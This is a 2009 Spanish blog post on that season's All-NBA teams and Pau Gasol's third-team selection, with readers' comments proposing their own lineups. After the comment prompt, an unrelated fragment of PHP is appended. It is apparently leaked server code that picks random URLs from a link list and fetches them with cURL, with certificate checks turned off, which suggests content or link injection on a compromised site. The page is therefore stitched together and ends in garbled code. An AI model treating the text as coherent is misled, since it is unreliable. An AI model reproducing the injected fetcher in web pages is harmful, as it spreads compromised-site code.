Mejores quintetos de la temporada

14 de May de 2009 por txusma

Podríamos enfocar la notica centrándonos en que Pau Gasol ha sido incluído en el tercer quinteto e iniciar un profundo análisis de la injusticia o justicia de la decisión, pero mejor vayamos por partes.

El primer quinteto ha quedado formado por Dwyane Wade, Kobe Bryant, Lebron James, Dirk Nowitzki y Dwight Howard, el segundo por Chris Paul, Brandon Roy, Paul Pierce, Tim Duncan y Yao Ming y el tercero por Tony Parker, Chauncey Billups, Carmelo Anthony, Pau Gasol y Shaquille O’Neal.

Recordemos que en estos quintetos se tienen muy en cuenta las posiciones y desde ese punto de vista se puede entender la inclusión de Nowitzki en detrimento de Chris Paul. En mi punto de vista, un quinteto con Lebron James como PF tampoco hubiera sido muy descompensado y habría hecho más justicia. Con el resto de elecciones podemos estar de acuerdo, aunque a lo mejor el base de los Jazz, Deron Williams, podría tener un sitio en lugar de, por ejemplo, Shaquille O’Neal. De hecho, Deron ha obtenido más votaciones que Shaquille pero las ganas de formar quintetos perfectamente compensados le ha dejado fuera.

Por tanto podemos discutir ese tercer quinteto de Gasol desde 2 puntos de vista: con unos equipos estrictamente compensados o relajando un poco esta característica. Con los equipos estrictamente compensados la discusión se simplifica a ordenar la temporada de Dirk Nowitzki, Tim Duncan y Pau Gasol. Sinceramente, me es muy complicado argumentar en favor de uno y otro y la tercera posición de Gasol creo que viene justificado por una falta de publicidad. Es su primera incursión en el quinteto y se enfrentaba a 2 monstruos que han ganado el MVP de la regular. Estaba cantado. En cambio si flexibilizamos, la discusión se abre y atañe también a Yao Ming y Shaquille O’Neal. Teniendo en cuenta que no creo que Shaquille se merezca estar en el tercer quinteto, ¿alguien piensa que Pau Gasol ha hecho mejor temporada que Yao Ming?

En definitiva la inclusión de Pau Gasol en el tercer mejor quinteto de la temporada me parece justa y un gran reconocimiento para el jugador. Si mantiene este nivel, estoy seguro de que lo veremos en el segundo o primer quinteto en alguna ocasión.

Y mis quintetos flexibilizando:

– Chris Paul, Dwyane Wade, Kobe Bryant, Lebron James, Dwight Howard.
– Chauncey Billups, Brandon Roy, Paul Pierce, Dirk Nowitzki, Yao Ming.
– Tony Parker, Deron Williams, Carmelo Anthony, Tim Duncan, Pau Gasol.

¿Los vuestros?

Comenta

8 comentarios a esta entrada

  1. kantonyo dice:
    #1

    Txusma, siento discrepar, pero yo no estoy de acuerdo en eso de flexibilizar las posiciones. Ya que un quinteto deben estar los mejores en cada puesto, y Lebron aunque seguro que tambien sería bueno de PF, su puesto es SF, por lo tanto yo apostaria por estos quintetos:

    1º) C. Paul – D. Wade – L. James – D. Nowitzki – D. Howard
    2º) C. Billups – K. Bryant – C. Anthony – P. Gasol – Y. Ming
    3º) D. Williams – B. Roy – P. Pierce – T. Duncan – A. Jefferson

      Citar

  2. Vader dice:
    #2

    Estoy de acuerdo con Kantonyo en que este año Kobe Bryant se quedaria fuera del primero, Wade y Lebron han sido los mejores aleros.

    Saludos

      Citar

  3. Jabho dice:
    #3

    Chungo, chungo entre CP3 y Dirk para el primer quinteto.

    Creo que Duncan ha hecho un temporadón, por encima de Yao, así que compraría los de Txus con Duncan de 5 en el 2º, Yao y Pau en el 3º.

      Citar

  4. Txusma dice:
    #4

    Kantonyo, en ningun momento he defendido que se deba flexibilizar las posiciones, era simplemente un “ejercicio filosofico”.
    En todo caso, la cuestion es que si Parker y Billups pueden compartir un quinteto pq no puede ser Lebron James PF en estos quintetos?

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    Yo creo que Glen Davis debería estar en el segundo quinteto, llamando a las puertas del primero.

      Citar

  6. Dantley2 dice:
    #6

    Obviamente cualquier quinteto sin Anthony Randolph es un error, pero lo dejaremos pasar.

    En esos quintetos está pesando para mi gusto demasiado si el equipo ha entrado en playoffs o no. De hecho sólo Shaq no ha entrado en playoffs. Eso deja fuera a gente que ha hecho temporadones en equipos mediocres, como Granger que para mí ha hecho muchísima mejor temporada que Melo o Pierce, o Kevin Durant que se ha salido en Seattle con un equipo que no podía dar más de sí.

      Citar

  7. TheDeerHunter dice:
    #7

    El concepto de base, escolta, alero, ala-pívot y pívot no es cerrado en absoluto. No se puede decir que Pau ha jugado de Alero toda la temporada, eso es falso. Como también es relativo encuadrar a Duncan en esa posición… o incluso a Nowitzki, que en ataque se mueve como un alero más.
    ¿no ha jugado en ningún momento Wade de base, o de alero?? ¿y Lebron?? ¿Kobe?? encuadrarlos como aleros no se ajusta exáctamente a la realidad.
    Por lo tanto, estructurar el quinteto en 5 posiciones ideales me parece tan injusto como pasar completamente de ellas.

    A partir de ahí, no concibo ningún quinteto que no incluya a Lebron, Kobe y Wade en el equipo. Un alero y dos escoltas, sí… pero que los tres se mueven continuamente por toda la línea exterior como les da la gana. De hecho, los tres me parecen más bases que más de la mitad de los titulares de otros equipos de la NBA (por ejemplo, Lakers sin irnos demasiado lejos) y más con la función que se les pide a los Point Guards por aquellos lares.
    Un peldaño por debajo está Dwight Howard, que nadie le puede toser el puesto en las posiciones interiores.

    A partir de aquí lo que se quiera… en mi opinión por méritos individuales Chris Paul, aunque no me parece injusto que se lo hayan dado a Nowitzki, por aquello de las posiciones (y eso que no sería la primera vez que se las pasan por los baos) No obstante su temporada no me parece especialmente brillante (de hecho es la peor que le recuerdo, y hablo de memoria) Tampoco me hubiera parecido mal que se lo dieran a Duncan y en ningún caso considero que la temporada de Gasol sea inferior a la de estos… pero me hubiera parecido un poco fuerte ponerle al mismo nivel que los Wade, Lebron, Kobe. Al fin y al cabo él no es un primera espada.
    La temporada de Billups también me parece sumamente acojonante. Quizás incluso más que la de CP3, sin tener en cuenta los números, obviamente.

    De los nombres que se barajan también incluiría a Joe Johnson… es una lástima que nadie se acuerde nunca de los Hawks con el temporadón que han hecho.

    En definitiva, tras todo este rollo. Mis quintetos:
    1.- Wade, Kobe, Lebron, Duncan, D. Howard
    2.- Paul, Roy, Granger, Nowitzki, Gasol
    3.- Billups, Joe Johnson, Pierce, Melo, Yao

    Parker y Shaq se me caen… me sabe mal pero por diferentes motivos lo veo justo. No me extenderé más.

      Citar

  8. Viva_Dirk dice:
    #8

    Estoy con Jose, yo creo que Durant deberia ser fijo en el 3º y sin ningun problema en el 2º.

    Para la mayoria de los premios INDIVIDUALES se esta valorando demasiado el equipo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>